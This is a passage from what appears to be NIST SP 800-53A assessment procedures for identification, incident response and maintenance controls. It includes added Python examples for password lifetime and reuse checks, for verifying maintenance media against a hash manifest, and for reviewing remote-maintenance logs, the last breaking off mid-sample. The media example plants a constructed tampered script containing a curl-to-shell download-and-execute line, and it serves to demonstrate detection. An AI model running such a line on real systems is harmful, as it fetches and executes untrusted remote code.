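    """Constant-time comparison of a candidate against a stored salt/digest pair."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return hmac.compare_digest(candidate, digest)


class PasswordAuthenticator:
    def __init__(self, initial_password: str, now: datetime, is_default: bool = True):
        self.salt, self.digest = hash_password(initial_password)
        self.changed_at = now
        # Default/initial content must be replaced before normal use (control item iii).
        self.must_change = is_default
        self.history: List[Tuple[bytes, bytes]] = []   # prior salt/digest pairs, newest last

    def verify(self, password: str, now: datetime) -> str:
        """Authenticate and report the authenticator's state."""
        if not matches(password, self.salt, self.digest):
            return "denied"
        if self.must_change:
            return "change-required"
        if now - self.changed_at > MAX_LIFETIME:
            return "expired"          # maximum lifetime restriction (guidance item iii)
        return "ok"

    def change(self, old: str, new: str, now: datetime) -> str:
        """Replace the password subject to lifetime and reuse rules."""
        if not matches(old, self.salt, self.digest):
            return "denied"
        if not self.must_change and now - self.changed_at < MIN_LIFETIME:
            return "too-soon"         # minimum lifetime restriction (guidance item iii)
        # Reuse check over the current password plus the previous generations (item iv).
        recent = [(self.salt, self.digest)] + self.history[-(REUSE_GENERATIONS - 1):]
        if any(matches(new, s, d) for s, d in recent):
            return "reused"
        self.history.append((self.salt, self.digest))
        self.salt, self.digest = hash_password(new)
        self.changed_at = now
        self.must_change = False
        return "changed"


def demo() -> List[str]:
    """Constructed walk-through of one account from installation default to expiry."""
    t0 = datetime(2024, 1, 1, 9, 0)
    acct = PasswordAuthenticator("Default-Pa55", t0)              # constructed default content
    return [
        acct.verify("Default-Pa55", t0),                           # change-required
        acct.change("Default-Pa55", "Spring-2024!x", t0),          # changed
        acct.verify("Spring-2024!x", t0 + timedelta(hours=2)),     # ok
        acct.change("Spring-2024!x", "Another-1", t0 + timedelta(hours=2)),   # too-soon
        acct.change("Spring-2024!x", "Default-Pa55", t0 + timedelta(days=2)), # reused
        acct.verify("Spring-2024!x", t0 + timedelta(days=90)),     # expired
    ]


if __name__ == "__main__":
    print(demo())
```

The record never stores the password itself, so an examination of "information system configuration settings and associated documentation" can confirm the hash parameters without exposing any authenticator content; the history list holds only salt/digest pairs, which is what makes the generation check possible without keeping old passwords.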


ASSESSMENT PROCEDURE
IA-6 AUTHENTICATOR FEEDBACK
Control: The information system obscures feedback of authentication information during the authentication process to protect the information from possible exploitation/use by unauthorized individuals.
Supplemental Guidance: The feedback from the information system does not provide information that would allow an unauthorized user to compromise the authentication mechanism. Displaying asterisks when a user types in a password is an example of obscuring feedback of authentication information.
IA-6.1 ASSESSMENT OBJECTIVE:
Determine if the information system obscures feedback of authentication information during the authentication process to protect the information from possible exploitation/use by unauthorized individuals.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Identification and authentication policy; procedures addressing authenticator feedback; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (L) (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing authenticator feedback]. (M) (H)


ASSESSMENT PROCEDURE
IA-7 CRYPTOGRAPHIC MODULE AUTHENTICATION
Control: The information system employs authentication methods that meet the requirements of applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance for authentication to a cryptographic module.
Supplemental Guidance: The applicable federal standard for authentication to a cryptographic module is FIPS 140-2 (as amended). Validation certificates issued by the NIST Cryptographic Module Validation Program (including FIPS 140-1, FIPS 140-2, and future amendments) remain in effect, and the modules remain available for continued use and purchase until a validation certificate is specifically revoked. Additional information on the use of validated cryptography is available at http://csrc.nist.gov/cryptval.
IA-7.1 ASSESSMENT OBJECTIVE:
Determine if the information system employs authentication methods that meet the requirements of applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance for authentication to a cryptographic module (for non-national security systems, the cryptographic requirements are defined by FIPS 140-2, as amended).
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Identification and authentication policy; FIPS 140-2 (as amended); procedures addressing cryptographic module authentication; information system design documentation; information system configuration settings and associated documentation; other relevant documents or records]. (L) (M) (H)
Test: [SELECT FROM: Automated mechanisms implementing cryptographic module authentication]. (M) (H)


FAMILY:

Incident Response


ASSESSMENT PROCEDURE
IR-1 INCIDENT RESPONSE POLICY AND PROCEDURES
Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, incident response policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the incident response policy and associated incident response controls.
Supplemental Guidance: The incident response policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The incident response policy can be included as part of the general information security policy for the organization. Incident response procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures. NIST Special Publication 800-61 provides guidance on incident handling and reporting. NIST Special Publication 800-83 provides guidance on malware incident handling and prevention.
IR-1.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents incident response policy and procedures;
(ii) the organization disseminates incident response policy and procedures to appropriate elements within the organization;
(iii) responsible parties within the organization periodically review incident response policy and procedures; and
(iv) the organization updates incident response policy and procedures when organizational review indicates updates are required.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Incident response policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with incident response responsibilities]. (H)
IR-1.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the incident response policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance;
(ii) the incident response policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and
(iii) the incident response procedures address all areas identified in the incident response policy and address achieving policy-compliant implementations of all associated incident response controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Incident response policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with incident response responsibilities]. (H)


ASSESSMENT PROCEDURE
IR-2 INCIDENT RESPONSE TRAINING
Control: The organization trains personnel in their incident response roles and responsibilities with respect to the information system and provides refresher training [Assignment: organization-defined frequency, at least annually].
Supplemental Guidance: None.
IR-2.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization identifies and documents personnel with incident response roles and responsibilities;
(ii) the organization provides incident response training to personnel with incident response roles and responsibilities;
(iii) incident response training material addresses the procedures and activities necessary to fulfill identified organizational incident response roles and responsibilities;
(iv) the organization defines in the security plan, explicitly or by reference, the frequency of refresher incident response training and the frequency is at least annually; and
(v) the organization provides refresher incident response training in accordance with organization-defined frequency.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Incident response policy; procedures addressing incident response training; incident response training material; security plan; incident response training records; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with incident response training and operational responsibilities]. (M) (H)
IR-2(1) INCIDENT RESPONSE TRAINING
Control Enhancement:
The organization incorporates simulated events into incident response training to facilitate effective response by personnel in crisis situations.
IR-2(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization incorporates simulated events into incident response training to facilitate effective response by personnel in crisis situations.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Incident response policy; procedures addressing incident response training; incident response training material; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with incident response training and operational responsibilities]. (H)
IR-2(2) INCIDENT RESPONSE TRAINING
Control Enhancement:
The organization employs automated mechanisms to provide a more thorough and realistic training environment.
IR-2(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs automated incident response training mechanisms to provide a more thorough and realistic training environment.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Incident response policy; procedures addressing incident response training; incident response training material; automated mechanisms supporting incident response training; other relevant documents or records].
Interview: [SELECT FROM: Organizational personnel with incident response training and operational responsibilities].


ASSESSMENT PROCEDURE
IR-3 INCIDENT RESPONSE TESTING AND EXERCISES
Control: The organization tests and/or exercises the incident response capability for the information system [Assignment: organization-defined frequency, at least annually] using [Assignment: organization-defined tests and/or exercises] to determine the incident response effectiveness and documents the results.
Supplemental Guidance: NIST Special Publication 800-84 provides guidance on test, training, and exercise programs for information technology plans and capabilities.
IR-3.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, incident response tests/exercises;
(ii) the organization defines in the security plan, explicitly or by reference, the frequency of incident response tests/exercises and the frequency is at least annually;
(iii) the organization tests/exercises the incident response capability for the information system using organization-defined tests/exercises in accordance with organization-defined frequency;
(iv) the organization documents the results of incident response tests/exercises; and
(v) the organization determines the effectiveness of the incident response capability.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Incident response policy; procedures addressing incident response testing and exercises; security plan; incident response testing material; incident response test results; other relevant documents or records]. (M) (H)
IR-3(1) INCIDENT RESPONSE TESTING AND EXERCISES
Control Enhancement:
The organization employs automated mechanisms to more thoroughly and effectively test/exercise the incident response capability.
Enhancement Supplemental Guidance: Automated mechanisms can provide the ability to more thoroughly and effectively test or exercise the capability by providing more complete coverage of incident response issues, selecting more realistic test/exercise scenarios and environments, and more effectively stressing the response capability.
IR-3(1).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization employs automated mechanisms to more thoroughly and effectively test/exercise the incident response capability for the information system; and
(ii) the automated mechanisms supporting incident response testing provide more complete coverage of incident response issues, more realistic test/exercise scenarios, and a greater stress on the incident response capability.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Incident response policy; procedures addressing incident response testing and exercises; security plan; incident response testing documentation; automated mechanisms supporting incident response tests/exercises; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with incident response testing responsibilities]. (H)


ASSESSMENT PROCEDURE
IR-4 INCIDENT HANDLING
Control: The organization implements an incident handling capability for security incidents that includes preparation, detection and analysis, containment, eradication, and recovery.
Supplemental Guidance: Incident-related information can be obtained from a variety of sources including, but not limited to, audit monitoring, network monitoring, physical access monitoring, and user/administrator reports. The organization incorporates the lessons learned from ongoing incident handling activities into the incident response procedures and implements the procedures accordingly. Related security controls: AU-6, PE-6.
IR-4.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization implements an incident handling capability for security incidents that includes preparation, detection and analysis, containment, eradication, and recovery; and
(ii) the organization incorporates the lessons learned from ongoing incident handling activities into the incident response procedures and implements the procedures accordingly.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Incident response policy; procedures addressing incident handling; NIST Special Publication 800-61; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with incident handling responsibilities]. (H)
Test: [SELECT FROM: Incident handling capability for the organization]. (H)
IR-4(1) INCIDENT HANDLING
Control Enhancement:
The organization employs automated mechanisms to support the incident handling process.
IR-4(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs automated mechanisms to support the incident handling process.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Incident response policy; procedures addressing incident handling; automated mechanisms supporting incident handling; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with incident handling responsibilities]. (H)


ASSESSMENT PROCEDURE
IR-5 INCIDENT MONITORING
Control: The organization tracks and documents information system security incidents on an ongoing basis.
Supplemental Guidance: None.
IR-5.1 ASSESSMENT OBJECTIVE:
Determine if the organization tracks and documents information system security incidents on an ongoing basis.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Incident response policy; procedures addressing incident monitoring; incident response records and documentation; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with incident monitoring responsibilities]. (H)
Test: [SELECT FROM: Incident monitoring capability for the organization]. (H)
IR-5(1) INCIDENT MONITORING
Control Enhancement:
The organization employs automated mechanisms to assist in the tracking of security incidents and in the collection and analysis of incident information.
IR-5(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs automated mechanisms to assist in the tracking of security incidents and in the collection and analysis of incident information.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Incident response policy; procedures addressing incident monitoring; information system design documentation; information system configuration settings and associated documentation; automated mechanisms supporting incident monitoring; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with incident monitoring responsibilities].
Test: [SELECT FROM: Automated mechanisms assisting in tracking of security incidents and in the collection and analysis of incident information]. (H)


ASSESSMENT PROCEDURE
IR-6 INCIDENT REPORTING
Control: The organization promptly reports incident information to appropriate authorities.
Supplemental Guidance: The types of incident information reported, the content and timeliness of the reports, and the list of designated reporting authorities or organizations are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. Organizational officials report cyber security incidents to the United States Computer Emergency Readiness Team (US-CERT) at http://www.us-cert.gov within the specified timeframe designated in the US-CERT Concept of Operations for Federal Cyber Security Incident Handling. In addition to incident information, weaknesses and vulnerabilities in the information system are reported to appropriate organizational officials in a timely manner to prevent security incidents. NIST Special Publication 800-61 provides guidance on incident reporting.
IR-6.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization promptly reports incident information to appropriate authorities;
(ii) incident reporting is consistent with NIST Special Publication 800-61;
(iii) the types of incident information reported, the content and timeliness of the reports, and the list of designated reporting authorities or organizations is consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance; and
(iv) weaknesses and vulnerabilities in the information system are reported to appropriate organizational officials in a timely manner to prevent security incidents.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Incident response policy; procedures addressing incident reporting; NIST Special Publication 800-61; incident reporting records and documentation; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with incident reporting responsibilities]. (M) (H)
IR-6(1) INCIDENT REPORTING
Control Enhancement:
The organization employs automated mechanisms to assist in the reporting of security incidents.
IR-6(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs automated mechanisms to assist in the reporting of security incidents.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Incident response policy; procedures addressing incident reporting; automated mechanisms supporting incident reporting; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with incident reporting responsibilities]. (H)


ASSESSMENT PROCEDURE
IR-7 INCIDENT RESPONSE ASSISTANCE
Control: The organization provides an incident response support resource that offers advice and assistance to users of the information system for the handling and reporting of security incidents. The support resource is an integral part of the organization's incident response capability.
Supplemental Guidance: Possible implementations of incident response support resources in an organization include a help desk or an assistance group and access to forensics services, when required.
IR-7.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization provides an incident response support resource that offers advice and assistance to users of the information system for the handling and reporting of security incidents; and
(ii) the incident response support resource is an integral part of the organization's incident response capability.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Incident response policy; procedures addressing incident response assistance; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with incident response assistance and support responsibilities]. (M) (H)
IR-7(1) INCIDENT RESPONSE ASSISTANCE
Control Enhancement:
The organization employs automated mechanisms to increase the availability of incident response-related information and support.
IR-7(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs automated mechanisms to increase the availability of incident response-related information and support.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Incident response policy; procedures addressing incident response assistance; automated mechanisms supporting incident response support and assistance; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with incident response support and assistance responsibilities and organizational personnel that require incident response support and assistance]. (H)


FAMILY: Maintenance

ASSESSMENT PROCEDURE
MA-1 SYSTEM MAINTENANCE POLICY AND PROCEDURES
Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, information system maintenance policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the information system maintenance policy and associated system maintenance controls.
Supplemental Guidance: The information system maintenance policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The information system maintenance policy can be included as part of the general information security policy for the organization. System maintenance procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures.
MA-1.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents information system maintenance policy and procedures;
(ii) the organization disseminates information system maintenance policy and procedures to appropriate elements within the organization;
(iii) responsible parties within the organization periodically review information system maintenance policy and procedures; and
(iv) the organization updates information system maintenance policy and procedures when organizational review indicates updates are required.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system maintenance policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (H)
MA-1.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the information system maintenance policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance;
(ii) the information system maintenance policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and
(iii) the information system maintenance procedures address all areas identified in the system maintenance policy and address achieving policy-compliant implementations of all associated system maintenance controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system maintenance policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (H)


ASSESSMENT PROCEDURE
MA-2 CONTROLLED MAINTENANCE
Control: The organization schedules, performs, documents, and reviews records of routine preventative and regular maintenance (including repairs) on the components of the information system in accordance with manufacturer or vendor specifications and/or organizational requirements.
Supplemental Guidance: All maintenance activities, including routine, scheduled maintenance and repairs, are controlled, whether performed on site or remotely and whether the equipment is serviced on site or removed to another location. Organizational officials approve the removal of the information system or information system components from the facility when repairs are necessary. If the information system or a component of the system requires off-site repair, the organization removes all information from associated media using approved procedures. After maintenance is performed on the information system, the organization checks all potentially impacted security controls to verify that the controls are still functioning properly.
MA-2.1 ASSESSMENT OBJECTIVE:
Determine if the organization schedules, performs, documents, and reviews records of routine preventative and regular maintenance (including repairs) on the components of the information system in accordance with manufacturer or vendor specifications and/or organizational requirements.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system maintenance policy; procedures addressing controlled maintenance for the information system; maintenance records; manufacturer/vendor maintenance specifications; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (M) (H)
MA-2(1) CONTROLLED MAINTENANCE
Control Enhancement:
The organization maintains maintenance records for the information system that include: (i) the date and time of maintenance; (ii) name of the individual performing the maintenance; (iii) name of escort, if necessary; (iv) a description of the maintenance performed; and (v) a list of equipment removed or replaced (including identification numbers, if applicable).
MA-2(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization maintains maintenance records for the information system that include: (i) the date and time of maintenance; (ii) name of the individual performing the maintenance; (iii) name of escort, if necessary; (iv) a description of the maintenance performed; and (v) a list of equipment removed or replaced (including identification numbers, if applicable).
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system maintenance policy; procedures addressing controlled maintenance for the information system; maintenance records; other relevant documents or records]. (M) (H)
MA-2(2) CONTROLLED MAINTENANCE
Control Enhancement:
The organization employs automated mechanisms to schedule and conduct maintenance as required, and to create up-to-date, accurate, complete, and available records of all maintenance actions, both needed and completed.
MA-2(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs automated mechanisms to schedule and conduct maintenance as required, and to create up-to-date, accurate, complete, and available records of all maintenance actions, both needed and completed.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system maintenance policy; procedures addressing controlled maintenance for the information system; automated mechanisms supporting information system maintenance activities; information system configuration settings and associated documentation; maintenance records; other relevant documents or records]. (H)


ASSESSMENT PROCEDURE
MA-3 MAINTENANCE TOOLS
Control: The organization approves, controls, and monitors the use of information system maintenance tools and maintains the tools on an ongoing basis.
Supplemental Guidance: The intent of this control is to address hardware and software brought into the information system specifically for diagnostic/repair actions (e.g., a hardware or software packet sniffer that is introduced for the purpose of a particular maintenance activity). Hardware and/or software components that may support information system maintenance, yet are a part of the system (e.g., the software implementing “ping,” “ls,” “ipconfig,” or the hardware and software implementing the monitoring port of an Ethernet switch) are not covered by this control.
MA-3.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization approves, controls, and monitors the use of information system maintenance tools; and
(ii) the organization maintains maintenance tools on an ongoing basis.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system maintenance policy; information system maintenance tools and associated documentation; procedures addressing information system maintenance tools; maintenance records; other relevant documents or records]. (M) (H)
MA-3(1) MAINTENANCE TOOLS
Control Enhancement:
The organization inspects all maintenance tools carried into a facility by maintenance personnel for obvious improper modifications.
Enhancement Supplemental Guidance: Maintenance tools include, for example, diagnostic and test equipment used to conduct maintenance on the information system.
MA-3(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization inspects all maintenance tools (e.g., diagnostic and test equipment) carried into a facility by maintenance personnel for obvious improper modifications.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system maintenance policy; information system maintenance tools and associated documentation; procedures addressing information system maintenance tools; maintenance records; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (H)
MA-3(2) MAINTENANCE TOOLS
Control Enhancement:
The organization checks all media containing diagnostic and test programs for malicious code before the media are used in the information system.
MA-3(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization checks all media containing diagnostic and test programs (e.g., software or firmware used for information system maintenance or diagnostics) for malicious code before the media are used in the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system maintenance policy; information system maintenance tools and associated documentation; procedures addressing information system maintenance tools; information system media containing maintenance programs (including diagnostic and test programs); maintenance records; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (H)
Test: [SELECT FROM: Media checking process for malicious code detection]. (H)
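One concrete way to implement the pre-use media check assessed under MA-3(2).1 is to verify every file on the diagnostic/test media against a known-good manifest of SHA-256 digests obtained out of band (from the vendor or the organization's own build), so that modified, missing, or extra files are flagged before the media is connected to the information system. The script below is an added example, not part of NIST SP 800-53A or any vendor tool; the manifest, file contents, the tampered script, and the stray autorun file are all constructed for the demonstration.

```python
"""Verify maintenance media against a known-good SHA-256 manifest (added example for MA-3(2))."""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed known-good contents of the diagnostic media. In practice only the
# manifest (path -> digest) is held, and it is obtained and protected out of band.
KNOWN_GOOD_FILES = {
    "diag/memtest.bin": b"MEMTEST v1.0 (constructed sample)\n",
    "diag/disktool.sh": b"#!/bin/sh\necho disk check\n",
}
MANIFEST: Dict[str, str] = {p: sha256_bytes(c) for p, c in KNOWN_GOOD_FILES.items()}


def hash_media(root: Path) -> Dict[str, str]:
    """Walk the mounted media and hash every regular file, keyed by relative POSIX path."""
    result: Dict[str, str] = {}
    for path in root.rglob("*"):
        if path.is_file():
            h = hashlib.sha256()
            with path.open("rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            result[path.relative_to(root).as_posix()] = h.hexdigest()
    return result


def verify_media(root: Path, manifest: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare media contents to the manifest; any non-empty list means the media fails the check."""
    actual = hash_media(root)
    report: Dict[str, List[str]] = {"modified": [], "unexpected": [], "missing": []}
    for rel, expected in manifest.items():
        if rel not in actual:
            report["missing"].append(rel)
        elif actual[rel] != expected:
            report["modified"].append(rel)
    for rel in actual:
        if rel not in manifest:
            report["unexpected"].append(rel)
    for key in report:
        report[key].sort()
    return report


def build_sample_media(root: Path) -> None:
    """Constructed media image: one manifest file tampered with, one file added that is not in the manifest."""
    for rel, content in KNOWN_GOOD_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(content)
    # Tampered diagnostic script (constructed): a download-and-execute line replaces the original body.
    (root / "diag/disktool.sh").write_bytes(b"#!/bin/sh\ncurl http://203.0.113.5/x | sh\n")
    # File not listed in the manifest (constructed).
    (root / "autorun.inf").write_bytes(b"[autorun]\nopen=setup.exe\n")


def demo() -> Dict[str, List[str]]:
    """Run the check against the constructed media image and return the report."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        build_sample_media(root)
        return verify_media(root, MANIFEST)


if __name__ == "__main__":
    for category, files in demo().items():
        print(f"{category}: {files}")
```

The allowlist check catches anything that differs from the approved image, including additions that a signature-based scanner would not recognize, but it is a complement to, not a replacement for, the malicious code scan the enhancement calls for: a manifest only protects against what it was built from, so the manifest itself must come from a trusted channel and be protected from modification.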
MA-3(3) MAINTENANCE TOOLS
Control Enhancement:
The organization checks all maintenance equipment with the capability of retaining information so that no organizational information is written on the equipment or the equipment is appropriately sanitized before release; if the equipment cannot be sanitized, the equipment remains within the facility or is destroyed, unless an appropriate organization official explicitly authorizes an exception.
MA-3(3).1 ASSESSMENT OBJECTIVE:
Determine if the organization either (a) checks all maintenance equipment with the capability of retaining information so that no organizational information is written on the equipment or the equipment is appropriately sanitized before release; or (b) retains the maintenance equipment within the facility or destroys the equipment if the equipment cannot be sanitized, unless an appropriate organization official explicitly authorizes an exception.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system maintenance policy; information system maintenance tools and associated documentation; procedures addressing information system maintenance tools; information system media containing maintenance programs (including diagnostic and test programs); maintenance records; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (H)
MA-3(4) MAINTENANCE TOOLS
Control Enhancement:
The organization employs automated mechanisms to restrict the use of maintenance tools to authorized personnel only.
MA-3(4).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs automated mechanisms to restrict the use of maintenance tools to authorized personnel only.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system maintenance policy; information system maintenance tools and associated documentation; procedures addressing information system maintenance tools; automated mechanisms supporting information system maintenance activities; information system design documentation; information system configuration settings and associated documentation; maintenance records; other relevant documents or records].
Test: [SELECT FROM: Automated mechanisms supporting information system maintenance activities].


ASSESSMENT PROCEDURE
MA-4 REMOTE MAINTENANCE
Control: The organization authorizes, monitors, and controls any remotely executed maintenance and diagnostic activities, if employed.
Supplemental Guidance: Remote maintenance and diagnostic activities are conducted by individuals communicating through an external, non-organization-controlled network (e.g., the Internet). The use of remote maintenance and diagnostic tools is consistent with organizational policy and documented in the security plan for the information system. The organization maintains records for all remote maintenance and diagnostic activities. Other techniques and/or controls to consider for improving the security of remote maintenance include: (i) encryption and decryption of communications; (ii) strong identification and authentication techniques, such as Level 3 or 4 tokens as described in NIST Special Publication 800-63; and (iii) remote disconnect verification. When remote maintenance is completed, the organization (or information system in certain cases) terminates all sessions and remote connections invoked in the performance of that activity. If password-based authentication is used to accomplish remote maintenance, the organization changes the passwords following each remote maintenance service. NIST Special Publication 800-88 provides guidance on media sanitization. The National Security Agency provides a listing of approved media sanitization products at http://www.nsa.gov/ia/government/mdg.cfm. Related security controls: IA-2, MP-6.
MA-4.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization authorizes, monitors, and controls the execution of maintenance and diagnostic activities conducted remotely by individuals communicating through an external, non-organization-controlled network (e.g., the Internet), if employed;
(ii) the organization documents in the security plan, the remote maintenance and diagnostic tools to be employed;
(iii) the organization maintains records for all remote maintenance and diagnostic activities;
(iv) the organization (or information system in certain cases) terminates all sessions and remote connections invoked in the performance of remote maintenance and diagnostic activity when the remote maintenance or diagnostics is completed; and
(v) the organization changes the passwords following each remote maintenance and diagnostic activity if password-based authentication is used to accomplish remote maintenance.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system maintenance policy; procedures addressing remote maintenance for the information system; information system design documentation; information system configuration settings and associated documentation; maintenance records; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (M) (H)
MA-4(1) REMOTE MAINTENANCE
Control Enhancement:
The organization audits all remote maintenance and diagnostic sessions and appropriate organizational personnel review the maintenance records of the remote sessions.
MA-4(1).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization audits all remote maintenance and diagnostic sessions; and
(ii) appropriate organizational personnel (as deemed by the organization) review the maintenance records of remote sessions.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Information system maintenance policy; procedures addressing remote maintenance for the information system; maintenance records; audit records; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system maintenance responsibilities]. (M) (H)
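The MA-4 supplemental guidance and MA-4(1) together describe what an assessor looks for in the records of remote maintenance: each session was authorized, ran within its approved window, was actually disconnected when the work finished (remote disconnect verification), and, where password-based authentication was used, the maintenance account password was changed afterwards. The script below is an added example, not part of NIST SP 800-53A or of any product, that reviews constructed audit records for exactly those conditions. The record format (pipe-separated fields with AUTHZ, OPEN, CLOSE and PWCHANGE events), the account name and the addresses are all assumptions made for the demonstration.

```python
"""Review remote maintenance audit records for MA-4 / MA-4(1) conditions (added example)."""
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional, Tuple

TS = "%Y-%m-%dT%H:%M:%S"

# Constructed audit records (not from any real system). Format:
#   timestamp|event|session_id|user|source_ip[|window=start/end]
# S1: authorized, closed, password rotated afterwards.
# S2: no authorization record and no password rotation after it closed.
# S3: authorized and opened, but never closed.
SAMPLE_LOG = """\
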